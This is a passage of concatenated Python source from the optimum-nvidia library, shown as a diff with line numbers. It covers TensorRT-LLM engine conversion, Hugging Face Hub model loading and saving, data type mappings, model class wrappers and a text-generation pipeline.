+ quantizer.preprocess_model(model, workspace=self.workspace)
374
+ quantizer.postprocess_model(model, workspace=self.workspace)
375
+ self.save_license()
376
+ return TensorRTArtifact.checkpoints(self._workspace.checkpoints_path)
377
+
378
+ def convert(self, models: Union['PretrainedModel', Sequence['PretrainedModel']], mapping: Optional['Mapping']=None) -> TensorRTArtifact:
379
+ if isinstance(models, PretrainedModel):
380
+ models = [models]
381
+ for (rank, model) in enumerate(models):
382
+ LOGGER.info(f'Converting {models[0].config.architecture} model for rank {rank} to TRTLLM')
383
+ model.save_checkpoint(str(self._workspace.checkpoints_path))
384
+ self.save_license()
385
+ return TensorRTArtifact.checkpoints(str(self._workspace.checkpoints_path))
386
+
387
+ def build(self, models: Union['PretrainedModel', Sequence['PretrainedModel']], config: 'BuildConfig') -> TensorRTArtifact:
388
+ if not isinstance(models, Sequence):
389
+ models = [models]
390
+ config = infer_plugin_from_build_config(config)
391
+ for model in models:
392
+ LOGGER.info(f'Building TRTLLM engine for rank {model.config.mapping.rank} ->> {config.to_dict()}')
393
+ engine = build(model, config)
394
+ engine.save(str(self._workspace.engines_path))
395
+ self.save_license()
396
+ return TensorRTArtifact.engines(str(self._workspace.engines_path))
397
+
398
+ # File: optimum-nvidia-main/src/optimum/nvidia/export/workspace.py
399
+ from dataclasses import dataclass
400
+ from pathlib import Path
401
+ from typing import Iterable, Optional
402
+ from huggingface_hub import cached_assets_path
403
+ from tensorrt_llm import __version__ as TRTLLM_VERSION
404
+ from optimum.nvidia import LIBRARY_NAME
405
+ from optimum.nvidia.export import PATH_FILE_CHECKPOINTS, PATH_FILE_ENGINES, PATH_FOLDER_CHECKPOINTS, PATH_FOLDER_ENGINES
406
+
407
+ @dataclass
408
+ class Workspace:
409
+ root: Path
410
+
411
+ @staticmethod
412
+ def from_hub_cache(model_id: str, device: str, namespace: str=LIBRARY_NAME, version: str=TRTLLM_VERSION, subpart: Optional[str]=None) -> 'Workspace':
413
+ assets_path = cached_assets_path(namespace, namespace=version, subfolder=model_id)
414
+ assets_path = assets_path.joinpath(device)
415
+ if subpart:
416
+ assets_path = assets_path.joinpath(subpart)
417
+ assets_path.mkdir(exist_ok=True, parents=True)
418
+ return Workspace(assets_path)
419
+
420
+ def __post_init__(self):
421
+ if not self.checkpoints_path.exists():
422
+ self.checkpoints_path.mkdir(parents=True)
423
+ if not self.engines_path.exists():
424
+ self.engines_path.mkdir(parents=True)
425
+
426
+ @property
427
+ def checkpoints_path(self) -> Path:
428
+ return self.root / PATH_FOLDER_CHECKPOINTS
429
+
430
+ @property
431
+ def engines_path(self) -> Path:
432
+ return self.root / PATH_FOLDER_ENGINES
433
+
434
+ @property
435
+ def checkpoints(self) -> Iterable[Path]:
436
+ return self.checkpoints_path.glob(PATH_FILE_CHECKPOINTS)
437
+
438
+ def engines(self) -> Iterable[Path]:
439
+ return self.engines_path.glob(PATH_FILE_ENGINES)
440
+
441
+ # File: optimum-nvidia-main/src/optimum/nvidia/generation/logits_process.py
442
+ import torch
443
+ from transformers import ForceTokensLogitsProcessor, SuppressTokensAtBeginLogitsProcessor, SuppressTokensLogitsProcessor
444
+ from transformers.generation.logits_process import WhisperNoSpeechDetection
445
+
446
+ class TrtSuppressTokensLogitsProcessor(SuppressTokensLogitsProcessor):
447
+
448
+ def __call__(self, step: int, input_ids: torch.Tensor, scores: torch.Tensor):
449
+ scores = super().__call__(input_ids, scores)
450
+ return scores
451
+
452
+ class TrtSuppressTokensAtBeginLogitsProcessor(SuppressTokensAtBeginLogitsProcessor):
453
+
454
+ def __call__(self, step: int, input_ids: torch.Tensor, scores: torch.Tensor):
455
+ scores = super().__call__(input_ids, scores)
456
+ return scores
457
+
458
+ class TrtForceTokensLogitsProcessor(ForceTokensLogitsProcessor):
459
+
460
+ def __call__(self, step: int, input_ids: torch.Tensor, scores: torch.Tensor):
461
+ scores = super().__call__(input_ids, scores)
462
+ return scores
463
+
464
+ class TrtWhisperNoSpeechDetection(WhisperNoSpeechDetection):
465
+
466
+ def __call__(self, step: int, input_ids: torch.Tensor, scores: torch.Tensor):
467
+ scores = super().__call__(input_ids, scores)
468
+ return scores
469
+ LOGITS_PROCESSOR_MAP = {SuppressTokensLogitsProcessor: TrtSuppressTokensLogitsProcessor, SuppressTokensAtBeginLogitsProcessor: TrtSuppressTokensAtBeginLogitsProcessor, ForceTokensLogitsProcessor: TrtForceTokensLogitsProcessor, WhisperNoSpeechDetection: TrtWhisperNoSpeechDetection}
470
+
471
+ # File: optimum-nvidia-main/src/optimum/nvidia/hub.py
472
+ import re
473
+ from abc import ABCMeta, abstractmethod
474
+ from logging import getLogger
475
+ from os import PathLike, scandir, symlink
476
+ from pathlib import Path
477
+ from shutil import copyfile, copytree
478
+ from typing import Dict, Generator, Iterable, List, Mapping, Optional, Type, Union
479
+ import torch.cuda
480
+ from huggingface_hub import ModelHubMixin, snapshot_download
481
+ from huggingface_hub.hub_mixin import T
482
+ from tensorrt_llm import __version__ as trtllm_version
483
+ from tensorrt_llm.models import PretrainedConfig
484
+ from tensorrt_llm.models import PretrainedModel as TrtLlmPreTrainedModel
485
+ from transformers import AutoConfig, GenerationConfig
486
+ from transformers import PretrainedConfig as TransformersPretraineConfig
487
+ from transformers.utils import CONFIG_NAME, GENERATION_CONFIG_NAME, SAFE_WEIGHTS_INDEX_NAME
488
+ from optimum.nvidia import LIBRARY_NAME
489
+ from optimum.nvidia.compression.modelopt import ModelOptRecipe
490
+ from optimum.nvidia.export import PATH_FOLDER_ENGINES, ExportConfig, TensorRTModelConverter, Workspace, auto_parallel
491
+ from optimum.nvidia.lang import DataType
492
+ from optimum.nvidia.models import SupportsFromHuggingFace, SupportsTransformersConversion
493
+ from optimum.nvidia.models.base import SupportFromTrtLlmCheckpoint
494
+ from optimum.nvidia.utils import get_user_agent
495
+ from optimum.nvidia.utils.nvml import get_device_count, get_device_name
496
+ from optimum.utils import NormalizedConfig
497
+ ATTR_TRTLLM_ENGINE_FOLDER = '__trtllm_engine_folder__'
498
+ FILE_TRTLLM_ENGINE_PATTERN = 'rank[0-9]*.engine'
499
+ FILE_TRTLLM_CHECKPOINT_PATTERN = 'rank[0-9]*.engine'
500
+ FILE_LICENSE_NAME = 'LICENSE'
501
+ HUB_SNAPSHOT_ALLOW_PATTERNS = [CONFIG_NAME, GENERATION_CONFIG_NAME, SAFE_WEIGHTS_INDEX_NAME, '*.safetensors', FILE_LICENSE_NAME]
502
+ LOGGER = getLogger()
503
+
504
+ def folder_list_engines(folder: Path) -> Iterable[Path]:
505
+ if folder.exists():
506
+ return list(folder.glob('*.engine'))
507
+ return []
508
+
509
+ def folder_list_checkpoints(folder: Path) -> Iterable[Path]:
510
+ checkpoint_candidates = []
511
+ if folder.exists():
512
+ re_checkpoint_filename = re.compile('rank[0-9]+\\.safetensors')
513
+ checkpoint_candidates = list(map(Path, filter(lambda item: re_checkpoint_filename.match(item.name), scandir(folder))))
514
+ return checkpoint_candidates
515
+
516
+ def get_rank_from_filename(filename: str) -> int:
517
+ name = filename.split('.')[0]
518
+ if name.startswith('rank'):
519
+ return int(name[3:])
520
+ else:
521
+ raise ValueError(f'Unknown filename format {filename} to extract rank from')
522
+
523
+ def get_trtllm_artifact(model_id: str, patterns: List[str], add_default_allow_patterns: bool=True) -> Path:
524
+ if (local_path := Path(model_id)).exists():
525
+ return local_path
526
+ return Path(snapshot_download(repo_id=model_id, repo_type='model', library_name=LIBRARY_NAME, library_version=trtllm_version, user_agent=get_user_agent(), allow_patterns=patterns + HUB_SNAPSHOT_ALLOW_PATTERNS if add_default_allow_patterns else patterns))
527
+
528
+ def get_trtllm_checkpoints(model_id: str, device: str, dtype: str):
529
+ if (workspace := Workspace.from_hub_cache(model_id, device)).checkpoints_path.exists():
530
+ return workspace.checkpoints_path
531
+ return get_trtllm_artifact(model_id, [f'{device}/{dtype}/**/*.safetensors'])
532
+
533
+ def get_trtllm_engines(model_id: str, device: str, dtype: str):
534
+ if (workspace := Workspace.from_hub_cache(model_id, device)).engines_path.exists():
535
+ return workspace.engines_path
536
+ return get_trtllm_artifact(model_id, [f'{device}/{dtype}/**/{PATH_FOLDER_ENGINES}/*.engine'])
537
+
538
+ def from_ranked_checkpoints(checkpoints_folder: Path, target_class: Type[SupportFromTrtLlmCheckpoint]) -> Generator['TrtLlmPreTrainedModel', None, None]:
539
+ root = str(checkpoints_folder)
540
+ trtllm_config = PretrainedConfig.from_checkpoint(root)
541
+ for rank in range(trtllm_config.mapping.world_size):
542
+ yield target_class.from_checkpoint(root, rank, trtllm_config)
543
+
544
+ def from_ranked_hf_model(local_hf_model_path: Path, config: 'TransformersPretraineConfig', target_class: Type['TrtLlmPreTrainedModel'], export_config: 'ExportConfig'):
545
+ root = str(local_hf_model_path)
546
+ for rank in range(export_config.sharding.world_size):
547
+ export_config.sharding.rank = rank
548
+ ranked_model = target_class.from_hugging_face(root, dtype=DataType.from_torch(config.torch_dtype).value, mapping=export_config.sharding, load_by_shard=True, use_parallel_embedding=export_config.sharding.world_size > 1, share_embedding_table=config.tie_word_embeddings)
549
+ ranked_model.config.mapping.rank = rank
550
+ yield ranked_model
551
+
552
+ class HuggingFaceHubModel(ModelHubMixin, library_name=LIBRARY_NAME, languages=['python', 'c++'], tags=['optimum-nvidia', 'trtllm'], repo_url='https://github.com/huggingface/optimum-nvidia', docs_url='https://huggingface.co/docs/optimum/nvidia_overview', metaclass=ABCMeta):
553
+
554
+ def __init__(self, engines_path: Union[str, PathLike, Path]):
555
+ self._engines_path = Path(engines_path)
556
+
557
+ @classmethod
558
+ def _from_pretrained(cls: Type[T], *, model_id: str, config: Dict, revision: Optional[str], cache_dir: Optional[Union[str, Path]], force_download: bool, proxies: Optional[Dict], resume_download: bool, local_files_only: bool, token: Optional[Union[str, bool]], use_cuda_graph: bool=False, device_map: Optional[str]=None, export_config: Optional[ExportConfig]=None, quantization_config: Optional[ModelOptRecipe]=None, force_export: bool=False, export_only: bool=False, save_intermediate_checkpoints: bool=False) -> T:
559
+ if get_device_count() < 1:
560
+ raise ValueError('No GPU detected on this platform')
561
+ device_name = get_device_name(0)[-1]
562
+ if 'torch_dtype' in config:
563
+ dtype = config['torch_dtype']
564
+ elif 'pretrained_config' in config and 'dtype' in config['pretrained_config']:
565
+ dtype = config['pretrained_config']['dtype']
566
+ else:
567
+ raise RuntimeError("Failed to detect model's dtype")
568
+ local_model_id = Path(model_id)
569
+ engines_folder = checkpoints_folder = None
570
+ engine_files = checkpoint_files = []
571
+ if local_model_id.exists() and local_model_id.is_dir():
572
+ if any((engine_files := list(folder_list_engines(local_model_id)))):
573
+ engines_folder = engine_files[0].parent
574
+ checkpoints_folder = None
575
+ else:
576
+ checkpoint_files = list(folder_list_checkpoints(local_model_id))
577
+ if checkpoint_files:
578
+ checkpoints_folder = checkpoint_files[0].parent
579
+ else:
580
+ if not force_export:
581
+ LOGGER.debug(f'Retrieving prebuild engine(s) for device {device_name}')
582
+ engines_folder = get_trtllm_engines(model_id, device_name, dtype)
583
+ engine_files = folder_list_engines(engines_folder)
584
+ if not engine_files:
585
+ LOGGER.debug(f'Retrieving checkpoint(s) for {device_name}')
586
+ checkpoints_folder = get_trtllm_checkpoints(model_id, device_name, dtype)
587
+ checkpoint_files = folder_list_checkpoints(checkpoints_folder)
588
+ if not engine_files:
589
+ LOGGER.info(f'No prebuild engines nor checkpoint were found for {model_id}')
590
+ if local_model_id.is_dir():
591
+ LOGGER.debug(f'Retrieving model from local folder: {local_model_id}')
592
+ original_checkpoints_path_for_conversion = local_model_id
593
+ workspace = Workspace(local_model_id)
594
+ else:
595
+ LOGGER.debug(f'Retrieving model from snapshot {model_id} on the Hugging Face Hub')
596
+ original_checkpoints_path_for_conversion = snapshot_download(model_id, repo_type='model', revision=revision, cache_dir=cache_dir, force_download=force_download, proxies=proxies, resume_download=resume_download, local_files_only=local_files_only, token=token, allow_patterns=HUB_SNAPSHOT_ALLOW_PATTERNS)
597
+ workspace = None
598
+ config = NormalizedConfig(AutoConfig.for_model(**config))
599
+ generation_config = GenerationConfig.from_pretrained(original_checkpoints_path_for_conversion)
600
+ if FILE_LICENSE_NAME in original_checkpoints_path_for_conversion:
601
+ licence_path = original_checkpoints_path_for_conversion.joinpath(FILE_LICENSE_NAME)
602
+ else:
603
+ licence_path = None
604
+ export_config = export_config or ExportConfig.from_config(config)
605
+ if device_map and device_map == 'auto':
606
+ LOGGER.info('Auto-parallel we will be used')
607
+ export_config = auto_parallel(export_config)
608
+ if isinstance(cls, SupportsTransformersConversion):
609
+ targets = cls.TRT_LLM_TARGET_MODEL_CLASSES
610
+ if not isinstance(targets, Mapping):
611
+ targets = {'': targets}
612
+ for (idx, (subpart, clazz)) in enumerate(targets.items()):
613
+ LOGGER.info(f'Building {model_id} {subpart} ({idx + 1} / {len(targets)})')
614
+ converter = TensorRTModelConverter(model_id, subpart, workspace, licence_path)
615
+ if quantization_config:
616
+ hf_model = cls.HF_LIBRARY_TARGET_MODEL_CLASS.from_pretrained(original_checkpoints_path_for_conversion, torch_dtype='auto', device_map='auto')
617
+ checkpoints_folder = converter.quantize(hf_model, quantization_config)
618
+ checkpoints_folder = checkpoints_folder.root
619
+ checkpoint_files = folder_list_checkpoints(checkpoints_folder)
620
+ del hf_model
621
+ torch.cuda.empty_cache()
622
+ if force_export or not len(list(converter.workspace.engines_path.glob('*.engine'))):
623
+ if checkpoint_files and isinstance(clazz, SupportFromTrtLlmCheckpoint):
624
+ ranked_models = from_ranked_checkpoints(checkpoints_folder, clazz)
625
+ elif isinstance(clazz, SupportsFromHuggingFace):
626
+ ranked_models = from_ranked_hf_model(original_checkpoints_path_for_conversion, config, clazz, export_config)
627
+ else:
628
+ raise TypeError(f"{clazz} can't convert from HF checkpoint")
629
+ generation_config = GenerationConfig.from_pretrained(original_checkpoints_path_for_conversion)
630
+ for ranked_model in ranked_models:
631
+ if save_intermediate_checkpoints:
632
+ _ = converter.convert(ranked_model)
633
+ LOGGER.info(f'Saved intermediate checkpoints at {converter.workspace.checkpoints_path}')
634
+ build_config = export_config.to_builder_config(ranked_model.config.quantization.quant_mode)
635
+ _ = converter.build(ranked_model, build_config)
636
+ engines_folder = converter.workspace.engines_path
637
+ generation_config.save_pretrained(engines_folder)
638
+ LOGGER.info(f'Saved TensorRT-LLM engines at {converter.workspace.engines_path}')
639
+ else:
640
+ LOGGER.info(f'Found existing engines at {converter.workspace.engines_path}')
641
+ else:
642
+ raise ValueError("Model doesn't support Hugging Face transformers conversion, aborting.")
643
+ else:
644
+ generation_config = GenerationConfig.from_pretrained(engines_folder)
645
+ return cls(engines_path=engines_folder, generation_config=generation_config, load_engines=not export_only)
646
+
647
+ @abstractmethod
648
+ def _save_additional_parcels(self, save_directory: Path):
649
+ raise NotImplementedError()
650
+
651
+ def _save_pretrained(self, save_directory: Path) -> None:
652
+ device_name = get_device_name(0)[-1]
653
+ save_directory = save_directory.joinpath(device_name)
654
+ save_directory.mkdir(parents=True, exist_ok=True)
655
+ src_license_file_path = self._engines_path.parent / FILE_LICENSE_NAME
656
+ dst_files = [src_license_file_path] if src_license_file_path.exists() else []
657
+ dst_files += list(self._engines_path.glob('*'))
658
+ for file in dst_files:
659
+ try:
660
+ symlink(file, save_directory.joinpath(file.relative_to(self._engines_path)))
661
+ except OSError as ose:
662
+ LOGGER.error(f'Failed to create symlink from current engine folder {self._engines_path.parent} to {save_directory}. Will default to copy based _save_pretrained', exc_info=ose)
663
+ dst = save_directory.joinpath(file.relative_to(self._engines_path))
664
+ if file.is_dir():
665
+ copytree(file, dst, symlinks=True)
666
+ elif file:
667
+ copyfile(file, dst)
668
+ self._save_additional_parcels(save_directory)
669
+
670
+ # File: optimum-nvidia-main/src/optimum/nvidia/lang/__init__.py
671
+ from enum import Enum
672
+ from typing import List
673
+ import torch
674
+
675
+ class DataType(str, Enum):
676
+ FLOAT32 = 'float32'
677
+ FLOAT16 = 'float16'
678
+ BFLOAT16 = 'bfloat16'
679
+ FLOAT8 = 'float8'
680
+ INT64 = 'int64'
681
+ INT32 = 'int32'
682
+ INT8 = 'int8'
683
+ UINT8 = 'uint8'
684
+ BOOL = 'bool'
685
+
686
+ @staticmethod
687
+ def from_torch(dtype: torch.dtype) -> 'DataType':
688
+ if dtype == torch.float32:
689
+ return DataType.FLOAT32
690
+ elif dtype == torch.float16:
691
+ return DataType.FLOAT16
692
+ elif dtype == torch.bfloat16:
693
+ return DataType.BFLOAT16
694
+ elif dtype == torch.float8_e4m3fn:
695
+ return DataType.FLOAT8
696
+ elif dtype == torch.int64:
697
+ return DataType.INT64
698
+ elif dtype == torch.int32:
699
+ return DataType.INT32
700
+ elif dtype == torch.int8:
701
+ return DataType.INT8
702
+ elif dtype == torch.uint8:
703
+ return DataType.UINT8
704
+ elif dtype == torch.bool:
705
+ return DataType.BOOL
706
+ else:
707
+ raise ValueError(f'Unknown torch.dtype {dtype}')
708
+
709
+ def to_trt(self) -> 'DataType':
710
+ import tensorrt as trt
711
+ if self == DataType.FLOAT32:
712
+ return trt.DataType.FLOAT
713
+ elif self == DataType.FLOAT16:
714
+ return trt.DataType.HALF
715
+ elif self == DataType.BFLOAT16:
716
+ return trt.DataType.BF16
717
+ elif self == DataType.FLOAT8:
718
+ return trt.DataType.FP8
719
+ elif self == DataType.INT8:
720
+ return trt.DataType.INT8
721
+ elif self == DataType.UINT8:
722
+ return trt.DataType.UINT8
723
+ elif self == DataType.INT32:
724
+ return trt.DataType.INT32
725
+ elif self == DataType.INT64:
726
+ return trt.DataType.INT64
727
+ elif self == DataType.BOOL:
728
+ return trt.DataType.BOOL
729
+ else:
730
+ raise ValueError(f'Unknown value {self}')
731
+
732
+ def to_torch(self):
733
+ import torch
734
+ if self == DataType.FLOAT32:
735
+ return torch.float32
736
+ elif self == DataType.FLOAT16:
737
+ return torch.float16
738
+ elif self == DataType.BFLOAT16:
739
+ return torch.bfloat16
740
+ elif self == DataType.FLOAT8:
741
+ return torch.float8_e4m3fn
742
+ elif self == DataType.INT8:
743
+ return torch.int8
744
+ elif self == DataType.UINT8:
745
+ return torch.uint8
746
+ elif self == DataType.INT32:
747
+ return torch.int32
748
+ elif self == DataType.INT64:
749
+ return torch.int64
750
+ elif self == DataType.BOOL:
751
+ return torch.bool
752
+ else:
753
+ raise ValueError(f'Unknown value {self}')
754
+
755
+ @staticmethod
756
+ def values() -> List[str]:
757
+ return [item.value for item in DataType]
758
+
759
+ # File: optimum-nvidia-main/src/optimum/nvidia/models/auto.py
760
+ from pathlib import Path
761
+ from typing import TYPE_CHECKING, Any, Dict, Optional, Type, Union
762
+ from huggingface_hub import ModelHubMixin
763
+ from optimum.nvidia.errors import UnsupportedModelException
764
+ from optimum.nvidia.models.gemma import GemmaForCausalLM
765
+ from optimum.nvidia.models.llama import LlamaForCausalLM
766
+ from optimum.nvidia.utils import model_type_from_known_config
767
+ if TYPE_CHECKING:
768
+ from optimum.nvidia.export import ExportConfig
769
+ from optimum.nvidia.runtime import CausalLM
770
+
771
+ class AutoModelForCausalLM(ModelHubMixin):
772
+ """"""
773
+ _SUPPORTED_MODEL_CLASS = {'llama': LlamaForCausalLM, 'mistral': LlamaForCausalLM, 'mixtral': LlamaForCausalLM, 'gemma': GemmaForCausalLM}
774
+
775
+ def __init__(self):
776
+ super().__init__()
777
+
778
+ @classmethod
779
+ def _from_pretrained(cls: Type, *, model_id: str, revision: Optional[str], cache_dir: Optional[Union[str, Path]], force_download: bool, proxies: Optional[Dict], resume_download: bool, local_files_only: bool, token: Optional[Union[str, bool]], config: Optional[Dict[str, Any]]=None, export_config: Optional['ExportConfig']=None, force_export: bool=False, use_cuda_graph: bool=False, **model_kwargs) -> 'CausalLM':
780
+ if config is None:
781
+ raise ValueError('Unable to determine the model type with config = None')
782
+ model_type = model_type_from_known_config(config)
783
+ if not model_type or model_type not in AutoModelForCausalLM._SUPPORTED_MODEL_CLASS:
784
+ raise UnsupportedModelException(model_type)
785
+ model_clazz = AutoModelForCausalLM._SUPPORTED_MODEL_CLASS[model_type]
786
+ model = model_clazz.from_pretrained(pretrained_model_name_or_path=model_id, config=config, revision=revision, cache_dir=cache_dir, force_download=force_download, proxies=proxies, resume_download=resume_download, local_files_only=local_files_only, token=token, export_config=export_config, force_export=force_export, use_cuda_graph=use_cuda_graph, **model_kwargs)
787
+ return model
788
+
789
+ # File: optimum-nvidia-main/src/optimum/nvidia/models/base.py
790
+ from os import PathLike
791
+ from typing import TYPE_CHECKING, Mapping, Optional, Protocol, Type, Union, runtime_checkable
792
+ if TYPE_CHECKING:
793
+ from tensorrt_llm.models import PretrainedConfig
794
+ from tensorrt_llm.top_model_mixin import TopModelMixin
795
+ from transformers import PreTrainedModel as TransformersPreTrainedModel
796
+
797
+ @runtime_checkable
798
+ class SupportsFromHuggingFace(Protocol):
799
+
800
+ @classmethod
801
+ def from_hugging_face(cls, hf_model_dir: Union[str, bytes, PathLike], dtype: str='float16', mapping: Optional[Mapping]=None, **kwargs):
802
+ ...
803
+
804
+ @runtime_checkable
805
+ class SupportFromTrtLlmCheckpoint(Protocol):
806
+
807
+ @classmethod
808
+ def from_checkpoint(cls, ckpt_dir: str, rank: Optional[int]=None, config: Optional['PretrainedConfig']=None):
809
+ ...
810
+
811
+ @runtime_checkable
812
+ class SupportsTransformersConversion(Protocol):
813
+ HF_LIBRARY_TARGET_MODEL_CLASS: Type['TransformersPreTrainedModel']
814
+ TRT_LLM_TARGET_MODEL_CLASSES: Union[Type['TopModelMixin'], Mapping[str, Type['TopModelMixin']]]
815
+
816
+ # File: optimum-nvidia-main/src/optimum/nvidia/models/gemma.py
817
+ from logging import getLogger
818
+ from tensorrt_llm.models.gemma.model import GemmaForCausalLM as TrtGemmaForCausalLM
819
+ from transformers import GemmaForCausalLM as TransformersGemmaForCausalLM
820
+ from optimum.nvidia.hub import HuggingFaceHubModel
821
+ from optimum.nvidia.models import SupportsTransformersConversion
822
+ from optimum.nvidia.runtime import CausalLM
823
+ LOGGER = getLogger(__name__)
824
+
825
+ class GemmaForCausalLM(CausalLM, HuggingFaceHubModel, SupportsTransformersConversion):
826
+ HF_LIBRARY_TARGET_MODEL_CLASS = TransformersGemmaForCausalLM
827
+ TRT_LLM_TARGET_MODEL_CLASSES = TrtGemmaForCausalLM
828
+ TRT_LLM_MANDATORY_CONVERSION_PARAMS = {'share_embedding_table': True}
829
+
830
+ # File: optimum-nvidia-main/src/optimum/nvidia/models/mistral.py
831
+ from logging import getLogger
832
+ from tensorrt_llm.models.llama.model import LLaMAForCausalLM
833
+ from transformers import MistralForCausalLM as TransformersMistralForCausalLM
834
+ from optimum.nvidia.hub import HuggingFaceHubModel
835
+ from optimum.nvidia.models import SupportsTransformersConversion
836
+ from optimum.nvidia.runtime import CausalLM
837
+ LOGGER = getLogger(__name__)
838
+
839
+ class MistralForCausalLM(CausalLM, HuggingFaceHubModel, SupportsTransformersConversion):
840
+ HF_LIBRARY_TARGET_MODEL_CLASS = TransformersMistralForCausalLM
841
+ TRT_LLM_TARGET_MODEL_CLASSES = LLaMAForCausalLM
842
+
843
+ # File: optimum-nvidia-main/src/optimum/nvidia/models/mixtral.py
844
+ from logging import getLogger
845
+ from tensorrt_llm.models.llama.model import LLaMAForCausalLM
846
+ from transformers import MixtralForCausalLM as TransformersMixtralForCausalLM
847
+ from optimum.nvidia.hub import HuggingFaceHubModel
848
+ from optimum.nvidia.models import SupportsTransformersConversion
849
+ from optimum.nvidia.runtime import CausalLM
850
+ LOGGER = getLogger(__name__)
851
+
852
+ class MixtralForCausalLM(CausalLM, HuggingFaceHubModel, SupportsTransformersConversion):
853
+ HF_LIBRARY_TARGET_MODEL_CLASS = TransformersMixtralForCausalLM
854
+ TRT_LLM_TARGET_MODEL_CLASSES = LLaMAForCausalLM
855
+
856
+ # File: optimum-nvidia-main/src/optimum/nvidia/models/whisper.py
857
+ from logging import getLogger
858
+ from typing import TYPE_CHECKING
859
+ from tensorrt_llm.models import DecoderModel as TrtDecoderModel
860
+ from tensorrt_llm.models import WhisperEncoder as TrtWhisperEncoder
861
+ from transformers.models.whisper.modeling_whisper import WhisperForConditionalGeneration as TransformersWhisperForConditionalGeneration
862
+ from optimum.nvidia.models import SupportsTransformersConversion
863
+ if TYPE_CHECKING:
864
+ pass
865
+ LOGGER = getLogger(__name__)
866
+
867
+ class WhisperForConditionalGeneration(SupportsTransformersConversion):
868
+ HF_LIBRARY_TARGET_MODEL_CLASS = TransformersWhisperForConditionalGeneration
869
+ TRT_LLM_TARGET_MODEL_CLASSES = {'encoder': TrtWhisperEncoder, 'decoder': TrtDecoderModel}
870
+
871
+ # File: optimum-nvidia-main/src/optimum/nvidia/pipelines/__init__.py
872
+ from os import PathLike
873
+ from typing import Dict, Optional, Tuple, Type, Union
874
+ from huggingface_hub import model_info
875
+ from tensorrt_llm import Module
876
+ from transformers import AutoTokenizer, PreTrainedTokenizer, PreTrainedTokenizerFast
877
+ from optimum.nvidia import AutoModelForCausalLM
878
+ from optimum.nvidia.pipelines.text_generation import TextGenerationPipeline
879
+ from .base import Pipeline
880
+ SUPPORTED_MODEL_WITH_TASKS: Dict[str, Dict[str, Tuple[Type[Pipeline], Type]]] = {'gemma': {'text-generation': (TextGenerationPipeline, AutoModelForCausalLM)}, 'llama': {'text-generation': (TextGenerationPipeline, AutoModelForCausalLM)}, 'mistral': {'text-generation': (TextGenerationPipeline, AutoModelForCausalLM)}, 'mixtral': {'text-generation': (TextGenerationPipeline, AutoModelForCausalLM)}}
881
+
882
+ def get_target_class_for_model_and_task(task: str, architecture: str) -> Optional[Type]:
883
+ task_ = SUPPORTED_MODEL_WITH_TASKS.get(task, None)
884
+ if not task:
885
+ raise NotImplementedError(f'Task {task} is not supported yet.')
886
+ target = task_.get(architecture, None)
887
+ if not target:
888
+ raise NotImplementedError(f'Architecture {architecture} is not supported for task {task}. Only the following architectures are: {list(task_.keys())}')
889
+ return target
890
+
891
+ def pipeline(task: str=None, model: Union[str, PathLike, Module]=None, tokenizer: Optional[Union[str, PreTrainedTokenizer, PreTrainedTokenizerFast]]=None, **kwargs):
892
+ try:
893
+ info = model_info(model)
894
+ except Exception as e:
895
+ raise RuntimeError(f'Failed to instantiate the pipeline inferring the task for model {model}: {e}')
896
+ model_type = info.config.get('model_type', None)
897
+ if not model_type:
898
+ raise RuntimeError(f'Failed to infer model type for model {model}')
899
+ elif model_type not in SUPPORTED_MODEL_WITH_TASKS:
900
+ raise NotImplementedError(f'Model type {model_type} is not currently supported')
901
+ if not task and getattr(info, 'library_name', 'transformers') == 'transformers':
902
+ if not info.pipeline_tag:
903
+ raise RuntimeError(f'Failed to infer the task for model {model}, please use `task` parameter')
904
+ task = info.pipeline_tag
905
+ if task not in SUPPORTED_MODEL_WITH_TASKS[model_type]:
906
+ raise NotImplementedError(f'Task {task} is not supported yet for {model_type}.')
907
+ if tokenizer is None:
908
+ tokenizer = AutoTokenizer.from_pretrained(model, use_fast=True)
909
+ (pipeline_factory, model_factory) = SUPPORTED_MODEL_WITH_TASKS[model_type][task]
910
+ model = model_factory.from_pretrained(model, **kwargs)
911
+ return pipeline_factory(model, tokenizer)
912
+
913
+ # File: optimum-nvidia-main/src/optimum/nvidia/pipelines/text_generation.py
914
+ import warnings
915
+ from enum import Enum
916
+ from typing import Dict, List, Union
917
+ import torch
918
+ from transformers import PreTrainedTokenizer, TensorType
919
+ from optimum.nvidia import AutoModelForCausalLM
920
+ from optimum.nvidia.runtime import CausalLM
921
+ from .base import Pipeline
922
+
923
+ class ReturnType(Enum):
924
+ TENSORS = 0
925
+ NEW_TEXT = 1
926
+ FULL_TEXT = 2
927
+
928
+ class TextGenerationPipeline(Pipeline):
929
+ TARGET_FACTORY = AutoModelForCausalLM
930
+ __slots__ = ('tokenizer', '_runtime')
931
+
932
+ def __init__(self, model: CausalLM, tokenizer: PreTrainedTokenizer):
933
+ super().__init__()
934
+ if tokenizer.eos_token and (not tokenizer.pad_token):
935
+ tokenizer.pad_token = tokenizer.eos_token
936
+ self.tokenizer = tokenizer
937
+ self._runtime = model
938
+
939
+ def __call__(self, inputs: Union[str, List[str]], add_special_tokens: bool=True, **kwargs):
940
+ (preprocess_params, forward_params, postprocess_params) = self._sanitize_parameters(add_special_tokens=add_special_tokens, **kwargs)
941
+ model_inputs = self.preprocess(inputs, **preprocess_params)
942
+ model_outputs = self._forward(model_inputs, **forward_params)
943
+ outputs = self.postprocess(model_outputs, **postprocess_params)
944
+ return outputs
945
+
946
+ def _sanitize_parameters(self, return_full_text=None, return_tensors=None, return_text=None, return_type=None, clean_up_tokenization_spaces=None, prefix=None, handle_long_generation=None, stop_sequence=None, add_special_tokens=False, **generate_kwargs):
947
+ preprocess_params = {'add_special_tokens': add_special_tokens}
948
+ if prefix is not None:
949
+ preprocess_params['prefix'] = prefix
950
+ if prefix:
951
+ prefix_inputs = self.tokenizer(prefix, padding=False, add_special_tokens=add_special_tokens, return_tensors=TensorType.PYTORCH)
952
+ generate_kwargs['prefix_length'] = prefix_inputs['input_ids'].shape[-1]
953
+ if handle_long_generation is not None:
954
+ if handle_long_generation not in {'hole'}:
955
+ raise ValueError(f"{handle_long_generation} is not a valid value for `handle_long_generation` parameter expected [None, 'hole']")
956
+ preprocess_params['handle_long_generation'] = handle_long_generation
957
+ preprocess_params.update(generate_kwargs)
958
+ forward_params = generate_kwargs
959
+ postprocess_params = {}
960
+ if return_full_text is not None and return_type is None:
961
+ if return_text is not None:
962
+ raise ValueError('`return_text` is mutually exclusive with `return_full_text`')
963
+ if return_tensors is not None:
964
+ raise ValueError('`return_full_text` is mutually exclusive with `return_tensors`')
965
+ return_type = ReturnType.FULL_TEXT if return_full_text else ReturnType.NEW_TEXT
966
